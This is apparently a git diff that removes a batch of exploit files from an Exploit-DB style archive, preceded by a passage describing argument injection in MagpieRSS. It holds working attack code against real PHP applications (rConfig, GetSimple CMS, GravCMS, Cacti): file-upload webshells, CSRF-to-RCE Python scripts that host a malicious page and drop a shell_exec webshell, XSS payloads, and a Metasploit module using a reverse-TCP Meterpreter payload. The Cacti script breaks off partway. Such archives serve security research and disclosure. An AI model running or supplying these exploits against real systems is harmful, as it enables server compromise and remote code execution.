Outside of that because it uses the curl request directly from the prompt it is not restricted and it is possible to request internal pages like 127.0.0.1 however it is restricted to https requests only, but you can partionaly work arround that by sending the url like this "https://www.example.com? http://localhost/server-status/" then it also can send it to a http domain however then it is blind ssrf but on https domains you can make it vissable by first saving it to a file and if you can't write in the /var/www/html folder you sometimes can write it to the /tmp/testtest.txt and use "https://www.example.com? --data '@/tmp/testtest.txt'" to retrieve that file.
The problem occures in the file /extlib/Snoopy.class.inc on line 660:
https://github.com/kellan/magpierss/blob/04d2a88b97fdba5813d01dc0d56c772d97360bb5/extlib/Snoopy.class.inc#L660
On that page there they use a escapeshellcmd command to escape the https url however they didn't put it between quotes.
so it's possible to add a "-" to this and rewrite the curl command on the /scripts/magpie_debug.php and /scripts/magpie_simple.php page.
from there on you can esculate it to Server side request forgery or Code injection.
It mostlickly affects most versions but i have only tested it on version 0.72.

70
exploits/php/webapps/49665.txt
View file

@ -1,70 +0,0 @@
# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)
# Date: 2021-03-17
# Exploit Author: Murat ŞEKER
# Vendor Homepage: https://www.rconfig.com
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
# Version: rConfig v3.9.6
# Install scripts :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Tested on: centOS 7
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
# Description:
rConfig, the open source network device configuration management tool, is vulnerable to Arbitrary File Upload to RCE in /lib/crud/vendors.crud.php with parameter 'vendorLogo'.
The following steps can be carried out in duplicating this vulnerability.
- Login the rConfig application with your credentials.
- Repeat
POST /lib/crud/vendors.crud.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@5y4o1s35jvx342apl7392qrqxh3m7aw.burpcollaborator.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------122590832918963661283831488254
Content-Length: 36619
Origin: https://localhost
Connection: close
Referer: http://4hmnkrm42ug2n1to46m8lpapggmlp9e.burpcollaborator.net/ref
Cookie: PHPSESSID=eafcfe393af7dc2a3dd9bd1ea0e9e49b
Upgrade-Insecure-Requests: 1
Cache-Control: no-transform
-----------------------------122590832918963661283831488254
Content-Disposition: form-data; name="vendorName"
thisisrce
-----------------------------122590832918963661283831488254
Content-Disposition: form-data; name="vendorLogo"; filename="file.php"
Content-Type: image/png
<?php phpinfo(); ?>
-----------------------------122590832918963661283831488254
Content-Disposition: form-data; name="add"
add
-----------------------------122590832918963661283831488254
Content-Disposition: form-data; name="editid"
-----------------------------122590832918963661283831488254--
- Than go to http(s)://<SERVER>/images/vendor/file.php
Note: The file.php can be accessed without valid credentials.
If you change the <?php phpinfo(); ?> to <?php echo $_GET["cmd"];?>
and navigate the http(s)://<SERVER>/images/vendor/file.php?cmd=id
The `id` command will execute on server.

21
exploits/php/webapps/49712.html
View file

@ -1,21 +0,0 @@
# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS
# Exploit Author: Abhishek Joshi
# Date: March 25, 2021
# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download
# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip
# Version: 0.1
# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10
# Tested against: Firefox 78.7.0esr (64-bit)
# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site.
## CSRF POST Form Method
<html><body>
<form action="http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin" method="POST">
<input type="hidden" name="customjs_url_content" value="">
<input type="hidden" name="customjs_js_content" value="alert('Hello Abhishek Joshi from CSRF --> XSS all the things!')">
<input type="hidden" name="submit" value="Save Settings">
<input type="submit" value="Submit request">
</form>
</body></html>

22
exploits/php/webapps/49713.txt
View file

@ -1,22 +0,0 @@
# Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS
# Exploit Author: George Tsimpidas
# Date: 2021-03-25
# Vendor Homepage: www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip
# Version : 1.0.0
# Tested on: Kali Linux 2020.4
# Category: Webapp
# Description
Regis Inventory And Monitoring System, suffers from a stored cross site scripting on Item's List Category
#PoC
1. Login as admin : http://localhost/regis_inventory/index.php
2. Visit : http://localhost/regis_inventory/item.php
3. Click add a New Item and input your payload on "Generic Name" textbox.
Payload : <script>alert("XSS")</script>
4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up

158
exploits/php/webapps/49774.py
View file

@ -1,158 +0,0 @@
# Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE
# Exploit Author: Bobby Cooke (boku)
# Date: 15/04/2021
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/extend/download.php?file=files/18274/1221/my-smtp-contact_1.1.1.zip&id=1221
# Vendor: NetExplorer
# Version: <= v1.1.1
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox
# About My SMTP Contact Plugin:
# An authenticated admin of the GetSimple CMS application, who has implemented the My SMTP Contact plugin, can navigate to the plugins configuration page within the admin console, and configure the settings for the SMTP form. The purpose of this plugin is to enable webpages of the CMS to host a contact form, where users of the application will be able to submit requests to the owner. These requests will be sent to the owner via SMTP email.
# CSRF Vulnerability Information:
# The GetSimple CMS application does not utilize the SameSite flag for the session cookie, and instead uses a CSRF token "nonce" to protect against cross-site attacks. Version of the My SMTP Contact plugin v1.1.1 and before do not implement the CSRF token. The vendor was contacted March 28th 2021, and released v1.1.2 in response, which remediates this vulnerability by implementing the CSRF "nonce" token.
# PHP Code Injection Vulnerability Information:
# When the administrator configures the SMTP settings, the backend PHP code of the plugin injects the admins user input into PHP code files. These user supplied values are injected into PHP strings which use double quotes. Some features of PHP double quote strings are that variables can be expanded within the strings, and variables enclosed in {} braces will attempt to evaluate complex expressions; resulting in code execution. The method in this proof of concept also overcomes the developers attempt to sanitize the user input by using htmlspecialchars() which removes "'<> and other dangerous characters. The developer received full disclosure of this vulnerability. A simple way to remediate this issue, would be to inject the user supplied input into single quote strings, versus the double quote strings. As single quote strings do not permit variable expansion and complex expression evaluation.
# Exploit Description:
# The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6
import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
class theTHREADER(object):
def __init__(self, interval=1):
self.interval = interval
thread = Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
run()
def webshell(target):
try:
websh = "{}/webshell.php".format(target)
term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST)
author = '{}{}]{}+++{}[{}========>{} Pwnage Provider : Bobby Cooke {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
print(author)
while True:
specialmove = input(term)
command = {'FierceGodKick': specialmove}
r = requests.post(websh, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
except:
pass
def generateCsrfPayload():
payload = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">'
payload += '<input type="hidden" name="act" value="addsettings">'
payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">'
payload += '<input type="hidden" name="m_smtp_c_email_to" value="boku@0xboku">'
payload += '<input type="hidden" name="m_smtp_c_smtp_or_standard" value="standard">'
payload += '<input type="hidden" name="m_smtp_c_digital_captcha" value="on">'
payload += '<input type="hidden" name="m_smtp_c_digitSalt" value="TLGfUrl3TyiaxOKwrg5d0exfBYKbHDwR">'
payload += '<input type="hidden" name="m_smtp_c_agree_checkbox" value="on">'
payload += '<input type="hidden" name="m_smtp_c_client_server" value="client_server">'
payload += '<input type="hidden" name="m_smtp_c_window_msg" value="on">'
payload += '<input type="hidden" name="m_smtp_c_default_css" value="on">'
payload += '<input type="hidden" name="m_smtp_c_sender_name" value="boku">'
payload += '<input type="hidden" name="m_smtp_c_subject" value="RCE">'
payload += '<input type="hidden" name="m_smtp_c_email_from" value="boku@0xboku">'
payload += '<input type="hidden" name="m_smtp_c_email_from_password" value="password123">'
payload += '<input type="hidden" name="m_smtp_c_email_from_ssl" value="ssl://smtp.0xboku">'
payload += '<input type="hidden" name="m_smtp_c_email_from_port" value="777">'
payload += '<input type="hidden" name="m_smtp_c_standard_email_from" value="boku@0xboku">'
payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="62605e65e25ab30">'
payload += '<input type="hidden" name="my_smtp_c_selected_name" value="asd">'
payload += '<input type="hidden" name="m_smtp_c_alternative_fields" value="off">'
payload += '<input type="hidden" name="m_smtp_c_qty_fields" value="1">'
payload += '<input type="hidden" name="m_smtp_c_limit_file_size" value="1">'
payload += '<input type="hidden" name="m_smtp_c_valid_file_format" value="jpeg">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Name[]" value="User name">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Name_ok[]" value="ok">'
payload += '<input type="hidden" name="m_smtp_c_arr_tags_Name[]" value="0">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Required[]" value="required">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Type[]" value="text">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Maxlength[]" value="50">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Code[]" value="{$m_smtp_c_qty_fields[shell_exec($_REQUEST[solarflare])]}">'
payload += '<input type="submit" value="Submit request">'
payload += '</form><body>'
return payload
class S(BaseHTTPRequestHandler):
def do_GET(self):
victim = self.client_address
victim = "{}:{}".format(victim[0],victim[1])
print("{} connected to Malicious CSRF Site!".format(victim))
self.wfile.write("{}".format(generateCsrfPayload()).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
banner = '{}{}GetSimpleCMS My SMTP Contact Plugin v1.1.1 - CSRF to RCE{}'.format(SB,FR,ST)
print(banner)
print('Listening for Victims to connect..')
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
# Attempts to exploit the Blind RCE of the PHP Code Injection from the CSRF attack to upload a PHP webshell
def tryUploadWebshell(target,contact):
try:
blind = target+contact
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
requests.post(url=blind, data=webshUpload, verify=False)
except:
pass
def checkWebshell(target):
try:
websh = "{}/webshell.php".format(target)
capsule = {'FierceGodKick':'pwnt?'}
resp = requests.post(url=websh, data=capsule, verify=False)
return resp.status_code
except:
pass
def argsetup():
about = SB+FT+'The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. '
about += FR+'CVSS Base Score: 9.6 | '
about += 'CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+ST
parser = argparse.ArgumentParser(description=about)
parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
parser.add_argument('SMTPContactPage',type=str,help='The path to the public page which implements the SMTP Contact form - Used for blind RCE')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = argsetup()
target = args.TargetSite
contact = args.SMTPContactPage
threadshed = theTHREADER()
pwnt = checkWebshell(target)
if pwnt != 200:
while pwnt != 200:
sleep(3)
tryUploadWebshell(target,contact)
sleep(2)
pwnt = checkWebshell(target)
print("{} Triggered the Blind RCE and caught a wild webshell!".format(ok))
webshell(target)

44
exploits/php/webapps/49783.py
View file

@ -1,44 +0,0 @@
# Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)
# Exploit Author: Vishwaraj Bhattrai
# Date: 18/04/2021
# Vendor Homepage: https://www.rconfig.com/
# Software Link: https://www.rconfig.com/
# Vendor: rConfig
# Version: <= v3.9.6
# Tested against Server Host: Linux+XAMPP
import requests
import sys
s = requests.Session()
host=sys.argv[1] #Enter the hostname
cmd=sys.argv[2] #Enter the command
def exec_cmd(cmd,host):
print "[+]Executing command"
path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd)
response=requests.get(path)
print response.text
print "\n[+]You can access shell via below path"
print path
def file_upload(cmd,host):
print "[+]Bypassing file upload"
burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"}
burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""}
burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n<?php $cmd=$_GET['x'];system($cmd);?>\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n"
requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data)
exec_cmd(cmd,host)
def login(host,cmd):
print "[+]Logging in"
burp0_url = "https://"+host+":443/lib/crud/userprocess.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data)
file_upload(cmd,host)
login(host,cmd)

160
exploits/php/webapps/49788.rb
View file

@ -1,160 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GravCMS Remote Command Execution',
'Description' => %q{
This module exploits arbitrary config write/update vulnerability to achieve remote code execution.
Unauthenticated users can execute a terminal command under the context of the web server user.
Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages.
In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of administrator controller without
needing any credentials. Particular method execution will result in arbitrary YAML file creation or content change of
existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes,
such as general site information change, custom scheduler job definition, etc. Due to the nature of the vulnerability,
an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command
under the context of the web-server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['CVE', '2021-21425'],
['URL', 'https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/']
],
'Privileged' => true,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'DefaultOptions' =>
{
'payload' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64',
'WfsDelay' => 90
},
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2021-03-29',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
CONFIG_CHANGES # user/config/scheduler.yaml
]
}
)
)
end
def check
# During the fix, developers changed admin-nonce to login-nonce.
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin')
)
if res && !res.get_hidden_inputs.first['admin-nonce'].nil?
CheckCode::Appears
else
CheckCode::Safe
end
end
def capture_cookie_token
print_status 'Sending request to the admin path to generate cookie and token'
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin')
)
# Cookie must contain grav-site-az09-admin and admin-nonce form field must contain value
if res && res.get_cookies =~ /grav-site-[a-z0-9]+-admin=(\S*);/ && !res.get_hidden_inputs.first['admin-nonce'].nil?
print_good 'Cookie and CSRF token successfully extracted !'
else
fail_with Failure::UnexpectedReply, 'The server sent a response, but cookie and token was not found.'
end
@cookie = res.get_cookies
@admin_nonce = res.get_hidden_inputs.first['admin-nonce']
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
end
capture_cookie_token
@task_name = Rex::Text.rand_text_alpha_lower(5)
# Msf PHP payload does not contain quotes for many good reasons. But a single quote will surround PHP binary's
# parameter due to the command execution library of the GravCMS. For that reason, surrounding base64 part of the
# payload with a double quote is necessary to command executed successfully.
payload.encoded.sub! 'base64_decode(', 'base64_decode("'
payload.encoded.sub! '));', '"));'
print_status 'Implanting payload via scheduler feature'
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'),
'cookie' => @cookie,
'vars_post' => {
'admin-nonce' => @admin_nonce,
'task' => 'SaveDefault',
"data[custom_jobs][#{@task_name}][command]" => '/usr/bin/php',
"data[custom_jobs][#{@task_name}][args]" => "-r #{payload.encoded}",
"data[custom_jobs][#{@task_name}][at]" => '* * * * *',
"data[custom_jobs][#{@task_name}][output]" => '',
"data[status][#{@task_name}]" => 'enabled',
"data[custom_jobs][#{@task_name}][output_mode]" => 'append'
}
)
if res && res.code == 200 && res.body.include?('Successfully saved')
print_good 'Scheduler successfully created ! Wait for 1 minute...'
end
end
def on_new_session
print_status 'Cleaning up the the scheduler...'
# Thanks to the YAML update method, we can remove the command details from the config file just by re-enabling
# the scheduler without any parameter:) It will leave the only command name in the config file.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'),
'cookie' => @cookie,
'vars_post' => {
'admin-nonce' => @admin_nonce,
'task' => 'SaveDefault',
"data[status][#{@task_name}]" => 'enabled'
}
)
if res && res.code == 200 && res.body.include?('Successfully saved')
print_good 'The scheduler config successfully cleaned up!'
end
end
end

174
exploits/php/webapps/49798.py
View file

@ -1,174 +0,0 @@
# Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE
# Exploit Author: Bobby Cooke (boku)
# Date: 22/04/2021
# Vendor Homepage: http://get-simple.info &
# Software Link: http://get-simple.info/download/
# Version: Exploit <= v1.1.1 | Stored XSS <= v1.1.2
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox (Linix & Windows), Internet Explorer
# Vendor: NetExplorer
# Exploit Description:
# The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. The PHP function htmlspecialchars() attempts to sanitize the user-input, but is trivially bypassed by passing the dangerous characters as escaped hex bytes. This allows attackers to breakout of the HTML rendered by the PHP engine, to run arbitrary client-side code within the admins browser; after the admin submits the POST request from the CSRF attack. Since GetSimple CMS suffers from a known PHP code injection vulnerability within the themes edit page, the attacker can ride the admins session to perform a chain of XHR requests within the admins browser. The XHR chain triggered by the CSRF attack will collect the CSRF Token from the themes edit page, and use the token to exploit the PHP Code Injection vulnerability to upload a webshell within every page hosted by the CMS.
# Full Disclosure: github.com/boku7/gsSMTP-Csrf2Xss2RCE/
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6
import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
class theTHREADER(object):
def __init__(self, interval=1):
self.interval = interval
thread = Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
run()
def webshell(target):
try:
websh = "{}/webshell.php".format(target,page)
term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST)
welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
print(welcome)
while True:
specialmove = input(term)
command = {'FierceGodKick': specialmove}
r = requests.post(websh, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
except:
pass
''' Breakout of the PHP and inject a <script> tag using escaped Hex codepoints to bypass the htmlspecialchars() PHP function
htmlspecailchars() only HTML encodes the chars: &"><'
"+><script>alert(1)</script> --> \x22\x2b\x3e\x3cscript\x3ealert(1)\x3c/script\x3e
PAYLOAD
- Replace alert(1) payload above with the XHR Chain to gain RCE
- XHR Chain first collects the CSRF token on the theme-edit.php page,
then uses the token to inject PHP code into all pages of the CMS via known vulnerable themes component of core application'''
def xhrRcePayload():
hexBreakoutOpen = '\\x22\\x2b\\x3e\\x3cscript\\x3e'
payload = 'var e=function(i){return encodeURIComponent(i);};'
payload += 'var h=\\x22application/x-www-form-urlencoded\\x22;'
payload += 'var u=\\x22/admin/theme-edit.php\\x22;'
payload += 'var xhr1=new XMLHttpRequest();'
payload += 'var xhr2=new XMLHttpRequest();'
payload += 'xhr1.onreadystatechange=function(){'
payload += 'if(xhr1.readyState==4 \\x26\\x26 xhr1.status==200){'
payload += 'r=this.responseXML;'
payload += 'nVal=r.querySelector(\\x22#nonce\\x22).value;'
payload += 'eVal=r.forms[1][2].defaultValue;'
payload += 'xhr2.open(\\x22POST\\x22,u,true);'
payload += 'xhr2.setRequestHeader(\\x22Content-Type\\x22,h);'
# for the $_REQUEST[solarflare] used for the webshell via shell_exec(), hex-escape the $ or else it will render in the PHP engine to early in the exploit chain
payload += 'payload=e(\\x22\\x3c?php echo shell_exec(\\x24_REQUEST[solarflare]) ?\\x3e\\x22);'
payload += 'params=\\x22nonce=\\x22+nVal+\\x22\\x26content=\\x22+payload+\\x22\\x26edited_file=\\x22+eVal+\\x22\\x26submitsave=Save+Changes\\x22;'
payload += 'xhr2.send(params);'
payload += '}};'
payload += 'xhr1.open(\\x22GET\\x22,u,true);'
payload += 'xhr1.responseType=\\x22document\\x22;'
payload += 'xhr1.send();'
hexBreakoutClose = '\\x3c/script\\x3e'
return hexBreakoutOpen + payload + hexBreakoutClose
def csrfPayload():
payload = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">'
payload += '<input type="hidden" name="act" value="addsettings">'
payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">'
payload += '<input type="hidden" name="m_smtp_c_sender_name" value="'+xhrRcePayload()+'">'
payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="395ed33a5ae4476">'
payload += '<input type="submit" value="Submit request">'
payload += '</form><body>'
return payload
class S(BaseHTTPRequestHandler):
def do_GET(self):
victim = self.client_address
victim = "{}:{}".format(victim[0],victim[1])
print("{} connected to Malicious CSRF Site!".format(victim))
self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
def tryUploadWebshell(target,page):
try:
blind = target+page
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
requests.post(url=blind, data=webshUpload, verify=False)
except:
pass
def checkWebshell(target):
try:
websh = "{}/webshell.php".format(target)
capsule = {'FierceGodKick':'pwnt?'}
resp = requests.post(url=websh, data=capsule, verify=False)
return resp.status_code
except:
pass
def sig():
SIG = SB+FY+" .-----.._ ,--.\n"
SIG += FY+" | .. > ___ | | .--.\n"
SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n"
SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\\n"
SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\\n"
SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST
return SIG
def argsetup():
about = SB+FB+' The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
parser.add_argument('Target',type=str,help=desc1)
desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
parser.add_argument('PublicPage',type=str,help=desc2)
args = parser.parse_args()
return args
if __name__ == '__main__':
header = SB+FR+' My SMTP Contact GetSimple CMS Plugin\n'
header += SB+FM+'CSRF '+FT+'-->'+FM+' Stored XSS '+FT+'-->'+FM+' XHR PHP Code Injection '+FT+'-->'+FM+' RCE\n'+ST
header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST
print(header)
args = argsetup()
target = args.Target
page = args.PublicPage
print(sig())
theTHREADER()
pwnt = checkWebshell(target)
if pwnt != 200:
while pwnt != 200:
sleep(3)
tryUploadWebshell(target,page)
sleep(2)
pwnt = checkWebshell(target)
print("{} A wild webshell appears!".format(ok))
webshell(target)

92
exploits/php/webapps/49810.py
View file

@ -1,92 +0,0 @@
# Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution
# Date: 04/28/2021
# Exploit Author: Leonardo Paiva
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/downloads/cacti-1.2.12.tar.gz
# Version: 1.2.12
# Tested on: Ubuntu 20.04
# CVE : CVE-2020-14295
# Credits: @M4yFly (https://twitter.com/M4yFly)
# References:
# https://github.commandcom/Cacti/cacti/issues/3622
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295
#!/usr/bin/python3
import argparse
import requests
import sys
import urllib.parse
from bs4 import BeautifulSoup
# proxies = {'http': 'http://127.0.0.1:8080'}
def login(url, username, password, session):
print("[+] Connecting to the server...")
get_token_request = session.get(url + "/cacti/index.php", timeout=5) #, proxies=proxies)
print("[+] Retrieving CSRF token...")
html_content = get_token_request.text
soup = BeautifulSoup(html_content, 'html.parser')
csrf_token = soup.find_all('input')[0].get('value').split(';')[0]
if csrf_token:
print(f"[+] Got CSRF token: {csrf_token}")
print("[+] Trying to log in...")
data = {
'__csrf_magic': csrf_token,
'action': 'login',
'login_username': username,
'login_password': password
}
login_request = session.post(url + "/cacti/index.php", data=data) #, proxies=proxies)
